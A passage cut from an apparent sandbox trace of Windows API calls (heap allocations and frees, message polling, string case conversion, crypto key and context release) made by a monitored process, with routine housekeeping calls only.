lpsz="SSA3500402704") returned 0xd [0267.129] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.129] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.129] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.129] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0267.129] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.129] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0267.129] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0267.129] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.129] CryptDestroyKey (hKey=0xaa57a0) returned 1 [0267.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0267.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0267.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0267.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0267.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0267.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0267.130] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0267.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0267.130] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0267.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0267.130] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0267.130] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0267.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0267.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0267.130] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0267.130] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.131] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0267.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0267.131] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0267.131] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0267.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0267.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0267.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0267.131] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0267.131] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0267.131] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0267.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0267.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0267.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0267.132] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0267.132] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0267.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0267.132] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.132] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0267.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0267.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0267.132] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.133] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0267.133] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0267.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0267.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0267.133] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.133] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.133] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0267.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0267.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.134] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0267.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0267.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0267.134] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0267.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0267.134] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0267.134] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0267.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0267.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0267.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0267.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0267.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0267.134] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0267.135] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.135] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0267.135] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0267.135] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.135] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.135] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.135] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.135] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0267.135] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0267.135] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0267.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0267.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0267.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0267.136] CryptReleaseContext (hProv=0xad2698, dwFlags=0x0) returned 1 [0267.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0267.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0267.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0267.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0267.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0267.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0267.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0267.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0267.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0267.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0267.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0267.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0267.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0267.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0267.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0267.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0267.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0267.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0267.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0267.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0267.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0267.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0267.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0267.138] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0267.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0267.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7a8 [0267.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0267.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0267.139] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0267.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0267.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0267.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0267.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0267.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0267.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0267.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0267.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0267.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0267.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0267.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0267.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.140] FreeLibrary (hLibModule=0x74d40000) returned 1 [0267.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0267.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0267.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0267.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0267.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0267.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0267.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0267.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0267.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0267.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0267.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa670 [0267.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7a8 [0267.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0267.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa538 [0267.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0267.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0267.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0267.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0267.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0267.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0267.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.142] CloseHandle (hObject=0x2cc) returned 1 [0267.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0267.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0267.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0267.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0267.145] HeapFree (in: 